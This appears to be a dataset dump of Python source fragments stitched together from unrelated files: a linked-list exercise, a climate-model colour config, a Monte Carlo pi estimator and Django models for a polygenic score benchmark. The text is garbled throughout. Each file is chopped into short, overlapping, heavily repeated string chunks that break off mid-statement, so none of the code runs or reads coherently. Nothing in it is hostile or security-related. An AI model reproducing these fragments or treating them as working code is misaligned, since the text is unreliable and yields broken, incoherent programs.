__init__(self): \"\"\" Initialize your data structure here. \"\"\" self.head =", "data structure here. \"\"\" self.head = None self.size = 0 def get(self, index):", "counter == index: return curr.val counter += 1 curr = curr.next def addAtHead(self,", "index equals to the length of linked list, the node will be appended", "= node self.size += 1 return else: curr = curr.next def deleteAtIndex(self, index):", "index, val): \"\"\" Add a node of value val before the index-th node", "structure here. \"\"\" self.head = None self.size = 0 def get(self, index): \"\"\"", "invalid, return -1. :type index: int :rtype: int \"\"\" if index < 0", "linked list. :type val: int :rtype: void \"\"\" node = Node(val) if not", "a node of value val before the index-th node in the linked list.", "index: return curr.val counter += 1 curr = curr.next def addAtHead(self, val): \"\"\"", ":rtype: void \"\"\" if self.size == 0 or index == 0: self.addAtHead(val) else:", "value of the index-th node in the linked list. If the index is", "__init__(self): \"\"\" Initialize your data structure here. \"\"\" self.head = None self.size =", "+= 1 curr = curr.next def addAtHead(self, val): \"\"\" Add a node of", "Get the value of the index-th node in the linked list. If the", "index-th node in the linked list. If the index is invalid, return -1.", "node.next = self.head self.head = node else: self.head = node self.size += 1", "\"\"\" node = Node(val) if self.head: node.next = self.head self.head = node else:", "the value of the index-th node in the linked list. If the index", "-= 1 return else: prev = next next = next.next counter += 1", "end of linked list. If index is greater than the length, the node", "self.head self.head = node else: self.head = node self.size += 1 def addAtTail(self,", "return else: prev = next next = next.next counter += 1 # Your", "the index-th node in the linked list, if the index is valid. :type" ]
[ "\"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\",", "\"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\":", "}, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\":", "-*- coding: utf-8 -*- \"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS =", "\"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\",", "\"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\": \"UM\", \"color\": \"tab:orange\", }, }", "utf-8 -*- \"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\":", "<reponame>projectcuisines/gcm_ana<filename>commons.py<gh_stars>1-10 # -*- coding: utf-8 -*- \"\"\"Definitions and objects commonly used between scripts.\"\"\"", "\"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\":", "commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\",", "scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": {", "# -*- coding: utf-8 -*- \"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS", "objects commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\":", "MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\":", "{ \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", },", "-*- \"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\": {", "\"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": {", "coding: utf-8 -*- \"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS = {", "and objects commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\",", "\"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\",", "\"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": {", "\"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\":", "\"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\": \"UM\", \"color\": \"tab:orange\",", "\"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\": \"UM\",", "\"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\":", "= { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\",", "between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\":", "{ \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\":", "\"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\":", "used between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", },", "{ \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", },", "}, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\": \"UM\", \"color\":", "{ \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\": \"UM\", \"color\": \"tab:orange\", }," ]
[ "[], [] for _ in range(trials + 1): x, y = random(), random()", "+ \" trials processing time: \" + str(time.process_time() - start)) return 4 *", "time import logging import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials):", "/ trials def generate_sample(trials): in_x, in_y, out_x, out_y = [], [], [], []", "\" + str(time.process_time() - start)) return 4 * count / trials def generate_sample(trials):", "= random(), random() if x * x + y * y <= 1:", "0 for _ in range(trials + 1): x, y = random(), random() if", "import random import time import logging import matplotlib.pyplot as plt logger = logging.getLogger()", "x * x + y * y <= 1: count += 1 logger.info(\"estimate", "time.process_time() count = 0 for _ in range(trials + 1): x, y =", "count = 0 for _ in range(trials + 1): x, y = random(),", "x * x + y * y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x),", "out_y def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r')", "def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x,", "str(time.process_time() - start)) return 4 * count / trials def generate_sample(trials): in_x, in_y,", "* x + y * y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y)", "def generate_sample(trials): in_x, in_y, out_x, out_y = [], [], [], [] for _", "out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show()", "4 * count / trials def generate_sample(trials): in_x, in_y, out_x, out_y = [],", "<gh_stars>0 from random import random import time import logging import matplotlib.pyplot as plt", "+ y * y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x,", "out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x',", "y = random(), random() if x * x + y * y <=", "= time.process_time() count = 0 for _ in range(trials + 1): x, y", "logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count = 0 for _ in", "x, y = random(), random() if x * x + y * y", "generate_sample(trials): in_x, in_y, out_x, out_y = [], [], [], [] for _ in", "if x * x + y * y <= 1: in_x.append(x), in_y.append(y) else:", "* y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x,", "import logging import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start", "if x * x + y * y <= 1: count += 1", "pi with \" + str(trials) + \" trials processing time: \" + str(time.process_time()", "out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def", "+ y * y <= 1: count += 1 logger.info(\"estimate pi with \"", "random(), random() if x * x + y * y <= 1: in_x.append(x),", "y * y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y,", "plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count = 0", "logging import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start =", "* y <= 1: count += 1 logger.info(\"estimate pi with \" + str(trials)", "random() if x * x + y * y <= 1: in_x.append(x), in_y.append(y)", "y * y <= 1: count += 1 logger.info(\"estimate pi with \" +", "logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count = 0 for _ in range(trials", "_ in range(trials + 1): x, y = random(), random() if x *", "plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000)", "out_x, out_y = [], [], [], [] for _ in range(trials + 1):", "in_y, out_x, out_y = [], [], [], [] for _ in range(trials +", "+= 1 logger.info(\"estimate pi with \" + str(trials) + \" trials processing time:", "out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y =", "processing time: \" + str(time.process_time() - start)) return 4 * count / trials", "\" + str(trials) + \" trials processing time: \" + str(time.process_time() - start))", "= logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count = 0 for _", "in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x,", "generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000))", "+ str(trials) + \" trials processing time: \" + str(time.process_time() - start)) return", "color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000) if __name__ ==", "y <= 1: count += 1 logger.info(\"estimate pi with \" + str(trials) +", "x + y * y <= 1: count += 1 logger.info(\"estimate pi with", "in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y,", "1): x, y = random(), random() if x * x + y *", "start = time.process_time() count = 0 for _ in range(trials + 1): x,", "out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000) if __name__ == '__main__': main()", "+ str(time.process_time() - start)) return 4 * count / trials def generate_sample(trials): in_x,", "= generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main():", "matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count", "import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time()", "<= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def", "plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000) if __name__ == '__main__':", "str(trials) + \" trials processing time: \" + str(time.process_time() - start)) return 4", "trials def generate_sample(trials): in_x, in_y, out_x, out_y = [], [], [], [] for", "in_x, in_y, out_x, out_y = [], [], [], [] for _ in range(trials", "logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count = 0 for", "random() if x * x + y * y <= 1: count +=", "random(), random() if x * x + y * y <= 1: count", "out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y", "= [], [], [], [] for _ in range(trials + 1): x, y", "as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count =", "\" trials processing time: \" + str(time.process_time() - start)) return 4 * count", "return 4 * count / trials def generate_sample(trials): in_x, in_y, out_x, out_y =", "out_y = [], [], [], [] for _ in range(trials + 1): x,", "time: \" + str(time.process_time() - start)) return 4 * count / trials def", "in range(trials + 1): x, y = random(), random() if x * x", "logger.info(\"estimate pi with \" + str(trials) + \" trials processing time: \" +", "random import random import time import logging import matplotlib.pyplot as plt logger =", "in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o',", "[], [], [] for _ in range(trials + 1): x, y = random(),", "range(trials + 1): x, y = random(), random() if x * x +", "[] for _ in range(trials + 1): x, y = random(), random() if", "start)) return 4 * count / trials def generate_sample(trials): in_x, in_y, out_x, out_y", "for _ in range(trials + 1): x, y = random(), random() if x", "in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y,", "<= 1: count += 1 logger.info(\"estimate pi with \" + str(trials) + \"", "with \" + str(trials) + \" trials processing time: \" + str(time.process_time() -", "from random import random import time import logging import matplotlib.pyplot as plt logger", "trials processing time: \" + str(time.process_time() - start)) return 4 * count /", "in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x,", "'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000) if __name__", "= 0 for _ in range(trials + 1): x, y = random(), random()", "y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y", "in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b')", "in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000) if", "count / trials def generate_sample(trials): in_x, in_y, out_x, out_y = [], [], [],", "* count / trials def generate_sample(trials): in_x, in_y, out_x, out_y = [], [],", "1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials):", "random import time import logging import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO)", "[], [], [], [] for _ in range(trials + 1): x, y =", "else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x,", "x + y * y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return", "draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y,", "def estimate_pi(trials): start = time.process_time() count = 0 for _ in range(trials +", "* x + y * y <= 1: count += 1 logger.info(\"estimate pi", "- start)) return 4 * count / trials def generate_sample(trials): in_x, in_y, out_x,", "1: count += 1 logger.info(\"estimate pi with \" + str(trials) + \" trials", "estimate_pi(trials): start = time.process_time() count = 0 for _ in range(trials + 1):", "+ 1): x, y = random(), random() if x * x + y", "1 logger.info(\"estimate pi with \" + str(trials) + \" trials processing time: \"", "import time import logging import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def", "count += 1 logger.info(\"estimate pi with \" + str(trials) + \" trials processing", "return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials)" ]
[ "[] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def", ") name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short", "models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return", "EFO to a single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label", "metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l return None class BM_Metric(models.Model):", "0: return l return None class BM_Metric(models.Model): \"\"\"Class to hold metric type, name,", "default='years') # e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type =", "samples\"\"\" # Links to related objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30,", "+= ' {}'.format(self.unit) if len(e) > 0: l.append(e) # Variability v = None", "self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size')", "if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in", "'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic,", "e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) > 0: l.append(e)", "International Classification of Diseases used in PGS \"\"\" id = models.CharField('Code ID', max_length=30,", "Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)',", "max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500)", "class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list", "{} {}' # Estimate e = '' if self.estimate != None: e +=", "in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type])))", "# Variability if self.variability != None: l[self.variability_type] = self.variability # Unit if self.unit", "= [] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data", "desc_list = { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error',", "models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to", "{} for type in data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for", "(m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l return None", "!= None: estimate = str(self.estimate) if self.range != None and self.range_type.lower() == 'ci':", "max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding,", "{}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower() == 'ci': e += '", "'Interquartile range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list =", "months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range')", "Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms =", "bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self,", "list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for", "class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list", "if self.estimate == None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None", "to describe the International Classification of Diseases used in PGS \"\"\" id =", "%s '%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self):", "''.join(category_labels) # return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time)", "= {} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data = {} for type", "#def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self):", "def format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit) return None def display_value(self):", "= self.variability # Unit if self.unit != None: l['unit'] = self.unit return l", "# return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self): # categories = self.category_list", "on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry", "# return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data =", "blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error", "# return [] #@property #def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' |", "terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s", "ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or doi', max_length=100,", "} if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe samples", "perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics", "models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard deviation", "+= str(self.range) if estimate: l[self.estimate_type] = estimate # Range if self.range != None", "= '' # if len(category_labels) > 0: # categories_data = ', '.join(category_labels) #", "not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: #", "if metrics: l = [] for m in metrics: if (m.type == metric_type):", "describe samples used in variant associations and PGS training/testing\"\"\" # Sample Information ##", "(Short)', max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units", "= self.category_list # if len(categories) > 0: # return [x.label for x in", "Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time", "self.variability != None: l[self.variability_type] = self.variability # Unit if self.unit != None: l['unit']", "score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS", "for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list =", "self.sample_number) * 100 return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id =", "[] for m in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l)", "'%s (%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s) def display_value(self): if", "class=\"toggle_table_btn pgs_helptip\" id=\"'+div_id+'\" title=\"Click to show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring", "else: return '' def display_values_dict(self): l = {} # Estimate estimate = ''", "display_value(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s =", "of samples\"\"\" # Links to related objects score_id = models.CharField('Polygenic Score (PGS) ID',", "None: percent = (self.sample_cases / self.sample_number) * 100 return round(percent,2) else: return None", "self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries']", "othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type):", "used in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full = models.CharField('Cohort", "null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval (ci), range,", "None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases !=", "str(self.range) # Variability if self.variability != None: l[self.variability_type] = self.variability # Unit if", "'' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data class", "cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples'])", "return '' def display_values_dict(self): l = {} # Estimate estimate = '' if", "'' # if len(categories) > 0: # category_labels = [] # for category", "# else: # return [] #@property #def category_labels(self): # category_labels = self.category_labels_list #", "count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not", "+= '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower() == 'ci':", "e = '' if self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate)", "= None if '[' not in e: if self.range != None: type_desc =", "self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0], 'value':", "None and self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if", "else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for", "class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls", "null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry", "elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l =", "metrics = self.performance_metric.all() if metrics: l = [] for m in metrics: if", "individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring += '<span class=\"only_export\">[</span>'", "(self.sample_cases / self.sample_number) * 100 return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False):", "on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return", "class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = []", "Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or doi',", "return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def", "in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return", "othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list", "single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait", "information related to controlled trait vocabulary (mainly to link multiple EFO to a", "= models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True)", "!= None and self.range_type.lower() == 'ci': estimate += str(self.range) if estimate: l[self.estimate_type] =", "] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric", "associations and PGS training/testing\"\"\" # Sample Information ## Numbers sample_number = models.IntegerField('Number of", "sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True)", "perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size", "'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list", "(PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional =", "models from django.conf import settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import", "helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v !=", "(iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100,", "null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True)", "used in variant associations and PGS training/testing\"\"\" # Sample Information ## Numbers sample_number", "None: percent_cases = '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a", "100 return round(percent,2) else: 